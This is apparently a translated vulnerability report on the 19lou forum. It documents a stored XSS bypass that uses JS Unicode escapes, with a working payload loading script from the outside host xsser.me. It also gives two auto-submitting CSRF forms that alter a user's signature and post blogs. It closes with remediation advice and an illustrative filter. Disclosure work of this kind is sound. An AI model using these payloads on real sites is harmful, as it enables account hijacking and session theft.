Filtering is not strict in one place on 19lou, resulting in a stored XSS in a sensitive location.
In addition, the cookies are set with HTTPONLY, yet the 19lou "little helper" account was still successfully hit.
Various 19lou interfaces do not check the REFERER, so there are all kinds of CSRF interfaces ~~~
In the forum, find a post to reply to. First write some content and send it out, then edit it in advanced mode!
Upload an image and click Publish!
Use Fiddler2 to capture the traffic; the interface http://www.19lou.com/util/keyword shows up.
http://www.19lou.com/post/edit is the key interface.
In this POST request, the attachments parameter does not strictly filter incoming data.
Testing shows that directly appending "> to the image address triggers a system error and returns HTTP 500.
It appears that almost anything ([{}] and so on) can be inserted into the POST by using JS Unicode escapes: after escaping, "> becomes \u0022\u003e.
We inserted \u0022\u003e after the trailing .png in attachments.
View the result:
The vulnerability is confirmed. Edit it again and add your own JS code ~~
"><script src=http://xsser.me/UZH56T></script>
I used this code for testing.
In that example, after JS Unicode escaping, the payload is inserted at the end of .png:
\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074 ... (the JS Unicode-escaped form of the payload above; the rest of the captured string is garbled in the source)
Inserted smoothly ~
http://support.19lou.com/forum-10-thread-229001343815994430-1-1.html
Among the victims, the 19lou "little helper" account was successfully hit ~
Various Permissions
Results.
========= CSRF ==========
Change signature:
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://www.19lou.com/user/sign/save_sign" method="post">
<input type="text" name="sign_text" value="XXX"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
Publish a blog post:
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://www.19lou.com/user/blog/publish" method="post">
<input type="text" name="subject" value="TITLE"/>
<input type="text" name="content" value="bodybodybodybodybodybodybodybody"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
There are many more CSRF points in plain sight. Check them yourselves ~~~~
Solution:
XSS:
Decode the JS Unicode escapes in attachments before filtering, and filter "> and similar characters.
In addition, for more on HTTPONLY see (http://imlonghao.com/post/2012-08-02/about httponly)
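The bypass above works because the server checks the raw attachments value before the JS Unicode escapes are decoded. The following is an added illustration (not 19lou's code); the sample attachment values are constructed, and it shows a check that decodes first and then allow-lists what an image path may contain:

```python
import re

# Constructed sample values for the attachments parameter (not captured from the site).
SAFE_PATH = "upload/2012/08/photo.png"
RAW_PAYLOAD = 'upload/2012/08/photo.png"><script src=http://example.invalid/x.js></script>'
ESCAPED_PAYLOAD = "upload/2012/08/photo.png\\u0022\\u003e"  # "> written as JS Unicode escapes

# Only plain image paths are acceptable once the value has been decoded.
ALLOWED_PATH = re.compile(r"^[A-Za-z0-9_/.-]+\.(png|jpe?g|gif)$")
JS_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_js_unicode(value: str) -> str:
    """Turn every \\uXXXX sequence back into the character it encodes."""
    return JS_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def naive_filter_accepts(value: str) -> bool:
    """The bypassable check: blocklist dangerous characters in the still-escaped string."""
    return not any(ch in value for ch in '"<>')


def strict_filter_accepts(value: str) -> bool:
    """Canonicalize first, then accept only a plain image path.

    Decoding before validation means \\u0022\\u003e is judged as the characters
    "> it stands for; the allow-list rejects anything that is not a path.
    """
    decoded = decode_js_unicode(value)
    return ALLOWED_PATH.fullmatch(decoded) is not None


if __name__ == "__main__":
    for sample in (SAFE_PATH, RAW_PAYLOAD, ESCAPED_PAYLOAD):
        print(f"{sample!r}: naive={naive_filter_accepts(sample)} strict={strict_filter_accepts(sample)}")
```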
CSRF:
Verify the request source (REFERER) on key interfaces, and include a random TOKEN in each form.